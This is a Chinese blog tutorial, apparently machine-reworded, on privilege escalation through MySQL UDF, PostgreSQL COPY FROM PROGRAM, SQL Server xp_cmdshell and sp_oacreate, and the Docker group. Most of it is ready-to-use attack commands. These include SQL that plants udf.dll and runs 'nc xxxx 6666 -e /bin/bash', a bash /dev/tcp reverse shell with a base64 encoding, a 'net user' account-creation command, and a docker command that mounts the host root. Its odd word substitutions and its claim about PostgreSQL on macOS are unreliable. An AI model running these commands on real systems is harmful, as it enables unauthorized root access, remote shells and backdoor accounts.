本文正在参与「金石方案 . 分割6万现金大奖」

前语

上一篇文章讲了一下环境变量提权不知道咱们学习的怎么样了，今天给咱们带来新的提权知识——”第三方服务提权”，本文会浅显易懂解说一下第三方服务提权的原理以及比如。

第三方服务

所谓的第三方服务能够大致了解为体系中装置的软件（例如sqlserver、 mysql、ftp），当这些软件的权限没有设置正确的权限管理机制，很简略被不法份子使用去进行权限提升。提权的思路是用第三方服务的缝隙能够拿到主机的 root 权限，比如某个组件经过root权限发动，那么咱们操控了组件就相当于得到了root权限。下面给咱们举一些提权的比如：

MySQL UDF 提权

UDF（Userdefined function）可翻译为用户自定义函数，其为mysql的一个拓展接口，能够为mysql增加一些函数。提权条件如下：

1.有必要是root权限（需求创立和抛弃自定义函数）

2.secure_file_priv=（有必要为空，secure_file_priv为null或许为/tmp/都不行，由于它需求在指定的位置写入udf文件）

咱们先检查mysql数据库是否有写入权限：

show global variables like '%secure%';

当 secure_file_priv 的值没有具体值时，表明不对 mysqld 的导入或许导出做限制，此刻可提权。限制条件如下：

mysql>5.1 mysql\lib\plugin
mysql<5.1 c:\windows

或许读者不太明白限制条件是什么意思，假如咱们要提权那么就要上传UDF 的动态链接库文件（实现共享函数库概念的一种办法），咱们能够在SQLMAP（sqlmap\data\udf\mysql）或许MSF中找到内置的udf.dll文件，而这个udf.dll文件上传途径的限制条件便是上面提到的。下一步便是上传udf.dll文件，这儿分为两种情况：

1.具有webshell权限时

咱们能够直接将udf.dll上传到指定目录的文件夹。

2.未具有webshell权限时

由于咱们不能直接上传了，所以需求经过查询句子来转码刺进udf.dll的内容：

use mysql;
set @a=concat('',0x代码); 
create table Ghost(data LONGBLOB); 
insert into Ghost values("");update Ghost set data = @a; 
代码为select hex(load_file('c:/udf.dll'))中的内容 
select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/udf.dll'; //导出ufd.dll 
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';//创立函数 
select sys_exec('nc xxxx 6666 -e /bin/bash'); #履行

之后咱们就提权成功了,监听一下就能够。

PostgreSQL

PostgreSQL是Mac OSX体系下最常用的数据库，当其版别坐落9.3-11.2,答应经过身份验证的superuser或许具有pg_read_server_files权限的用户履行恣意指令。根本流程如下：

drop table if exists cmd_exec; #先删去你想要运用但是已经存在的表
create table cmd_exec(cmd_output text); #创立保存体系指令输出的表
copy cmd_exec from program 'id'; #履行体系指令使用特定函数
select * from cmd_exec; #检查履行成果

而cmd_exec中的内容能够是反弹shell:

COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/xxxx/xx 0>&1';

不过需求注意的是直接这样写会履行失利，咱们需求将反弹shell的指令进行base64编码再传入：

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3h4eHgveHggMD4mMQ==

Sqlserver提权

sqlserver数据库也有很多提权办法，这儿就简略举一些比如：

xp_cmdshell

该字符代表的是高权限用户，运用xp_cmdshell能够以system权限履行操作体系指令，由于高版别默许是不打开的，于是咱们首先要打开该设置：

exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;

发动后咱们就能够用该指令来履行体系指令，比如说咱们增加一个用户

exec master..xp_cmdshell 'net user xino 123 /add'

sp_oacrate

同样需求咱们敞开这个设置后，只不过使用有一些不一样，需求调用run办法：

EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

履行whoami

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c whoami'

DOCKER组提权

这个是最近了解到的提权办法，假如一个普通用户在docker组里，由于docker组的指令履行权力很大，用户履行指令后会在前面加上sudo,咱们能够经过一段指令来进行提权

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

输入后会提示咱们权限变更为root，提权成功。

结语

总结了一下第三方服务器提权，相比于其他提权办法仍是挺简略的，只需求找到对应第三方服务的缝隙即可测验提权，当然咱们也能够在MSF里找到对应的payload,仔细学习一下仍是挺好了解的，本文就讲到这儿，喜欢的话无妨一键三连。